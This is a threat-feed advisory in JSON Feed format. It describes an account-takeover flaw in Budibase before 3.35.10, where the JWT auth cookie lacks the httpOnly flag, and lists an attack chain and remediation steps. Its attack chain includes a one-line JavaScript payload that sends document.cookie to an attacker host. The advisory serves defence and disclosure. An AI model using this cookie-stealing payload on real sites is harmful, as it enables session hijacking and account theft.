{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/vendors/budibase/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Budibase (versions prior to 3.35.10)"],"_cs_severities":["high"],"_cs_tags":["xss","account takeover","jwt","cookie"],"_cs_type":"advisory","_cs_vendors":["Budibase"],"content_html":"\u003cp\u003eBudibase, a low-code platform, is vulnerable to account takeover due to the insecure configuration of its authentication cookie. The \u003ccode\u003ebudibase:auth\u003c/code\u003e cookie, which stores the JWT session token, is set without the \u003ccode\u003ehttpOnly\u003c/code\u003e flag. This allows JavaScript, including malicious scripts injected via Cross-Site Scripting (XSS) vulnerabilities like GHSA-gp5x-2v54-v2q5, to access the cookie\u0026rsquo;s contents.  An attacker exploiting this can steal the JWT and use it to impersonate the victim, gaining persistent access to their account.  Furthermore, the cookie lacks the \u003ccode\u003esecure\u003c/code\u003e and \u003ccode\u003esameSite\u003c/code\u003e attributes, exacerbating the risk. This vulnerability affects all Budibase deployments running versions prior to 3.35.10, as the insecure cookie configuration is hardcoded in the backend.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a Budibase instance running a vulnerable version (prior to 3.35.10).\u003c/li\u003e\n\u003cli\u003eAttacker exploits an existing XSS vulnerability, such as the stored XSS via unsanitized entity names (GHSA-gp5x-2v54-v2q5).\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious JavaScript payload designed to read the \u003ccode\u003ebudibase:auth\u003c/code\u003e cookie using \u003ccode\u003edocument.cookie\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe injected JavaScript executes within the victim\u0026rsquo;s browser when they interact with the application (e.g., viewing an entity with a malicious name).\u003c/li\u003e\n\u003cli\u003eThe malicious script retrieves the JWT session token from the \u003ccode\u003ebudibase:auth\u003c/code\u003e cookie.\u003c/li\u003e\n\u003cli\u003eThe script exfiltrates the stolen JWT to an attacker-controlled server, for example, by sending it as a URL parameter in an image request: \u003ccode\u003enew Image().src = 'https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie);\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen JWT to authenticate to the Budibase application, bypassing normal login procedures.\u003c/li\u003e\n\u003cli\u003eThe attacker gains persistent access to the victim\u0026rsquo;s account and can perform actions as the victim, including accessing sensitive data, modifying application configurations, and creating new malicious entities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe lack of the \u003ccode\u003ehttpOnly\u003c/code\u003e flag on the \u003ccode\u003ebudibase:auth\u003c/code\u003e cookie transforms every XSS vulnerability in Budibase into a critical account takeover risk. Attackers can persistently compromise user accounts, leading to potential data breaches, unauthorized application modifications, and further propagation of malicious content. This impacts all Budibase deployments running vulnerable versions, potentially affecting a wide range of organizations using the platform for their internal applications and workflows. The vulnerability allows attackers to bypass authentication controls and gain full control over compromised accounts.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Budibase to version 3.35.10 or later to address the insecure cookie configuration in \u003ccode\u003epackages/backend-core/src/utils/utils.ts\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the following Sigma rule to detect potential JWT theft attempts via unusual network connections originating from the browser.\u003c/li\u003e\n\u003cli\u003eReview and remediate all existing XSS vulnerabilities within your Budibase applications, as they can now lead to full account takeover.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-budibase-account-takeover/","summary":"The `budibase:auth` cookie in Budibase is set without the `httpOnly` flag, enabling attackers with XSS to steal JWTs and gain persistent access to user accounts.","title":"Budibase XSS Leads to Account Takeover via JWT Theft","url":"https://feed.craftedsignal.io/briefs/2024-01-budibase-account-takeover/"}],"language":"en","title":"CraftedSignal Threat Feed — Budibase","version":"https://jsonfeed.org/version/1.1"}